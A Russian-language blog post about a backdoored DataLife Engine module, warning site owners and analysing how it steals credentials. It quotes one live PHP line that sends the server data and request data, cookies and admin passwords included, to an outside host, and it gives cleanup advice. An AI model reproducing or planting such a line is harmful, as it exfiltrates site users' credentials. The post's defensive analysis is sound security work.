Взлом DLE. Как защититься? для DLE

Взлом DLE. Как защититься?

Взлом DLE. Как защититься?

Взлом DLE или что такое глупость и как она лечится
Прочитал только что пост на форуме и удивился той наглости, с которой пытаются взламывать DLE.
Приведу только ключевую строку, которая собственно и является виновницей:
$result_search=file_get_contents("http://www.dplspider.ru/main_service.php?dpserver=".urlencode(serialize($_SERVER))."&dpquery=".urlencode(serialize($_REQUEST))) or die("<br><br><a href='http://www.dplspider.ru/faq/'>Возможная причина ошибки</a><br>Поддержка <a href='mailto:find@dplspider.ru'>find@dplspider.ru</a>");
echo($result_search);

В итоге этот скрипт все же что-то нам выводит, чтобы мы не заподозрили чего неладного. Однако, разберем его подробнее:
Мы отправляем _GET запрос на какой-то адрес в котором так же отправляем подробную информацию о вашем сервере и еще некую информацию о посетителе, это все содержится в массиве $_SERVER. Но это пол дела, основное кроется в $_REQUEST.
Как известно, суперглобальный массив $_REQUEST объединяет в себе массивы: $_POST, $_GET и $_COOKIE. А вот в массиве $_COOKIE хранятся ваши пароли на доступ к сайту. Т.е. каждый пользователь обратившись к этому скрипту - отправляет злоумышленнику свои пароли. Администратор, естественно, является одним из первых отправивших свой пароль.
Вот так вот вас и взламывают, потом через "Поиск и Замена" вставляют свои скрипты в полную новость, в шаблоны и т.д.

Так что мой вам совет - не ставьте все подряд из интернета к себе на сервер, не посоветовавшись с доверенными специалистами.

Выкладываю часть диалога с разрешения собеседника:
****** (17:03:19 15/01/2011)
Здравствуйте

****** (17:03:27 15/01/2011)
прочитал Вашу статью

****** (17:04:20 15/01/2011)
по поводу взлома дле, я автор поста

****** (17:04:45 15/01/2011)
скажите пожалуйста как избавится от этой дряни

Sander (17:05:17 15/01/2011)
Если хоть раз запустился - менять пароли админов сайта

****** (17:06:16 15/01/2011)
запускался, и не раз, 2 раза взламывался (добавлялись ссылки с эротикой и появились непонятного рода ссылки в индексе сайта)

Sander (17:06:49 15/01/2011)
удалить код.
сменить пароли, почистить сайт.





Вот еще случай из практики. Не хотела запускаться админка модуля, упорно писало "Hacking attemp!".
Оказалось что в файле админки (в index.php тоже самое) вместо привычного:
define ( 'DATALIFEENGINE', true );

Было написано:
define ( 'DLE', true );


После решения проблемы часть диалога:
Sander (00:57:51 27/01/2011)
Откуда dle качал?

****** (00:57:57 27/01/2011)
хз ))

Sander (00:58:07 27/01/2011)
не удивляйся, если взломают.

****** (00:58:13 27/01/2011)
хм

****** (00:58:24 27/01/2011)
а де скачать чтоб не взломали ?

Sander (00:58:39 27/01/2011)
не ставить всякие сомнительные сборки

Sander (00:58:53 27/01/2011)
в 90% случаев там бекдоры и шеллы

****** (00:59:06 27/01/2011)
аа

****** (00:59:10 27/01/2011)
вот оно что

****** (00:59:26 27/01/2011)
а то мне недавно какой-то левый код в новостях впихнули



Будте внимательны и осторожны! Удачи.
Комментарии: (1)
  1. foto
    Посетитель 15 сентября 2017 01:04 #
    В таких случаях можно дополнительно воспользоваться софтинкой с помощью которой производят поиск ссылок, типо анти-лич линк
    0
Добавить комментарий
  • Логин
  • E-mail
Повторите рисунок:
antibot
© Sander-Development. 2009-2018.
При копировании, ссылка на источник обязательна.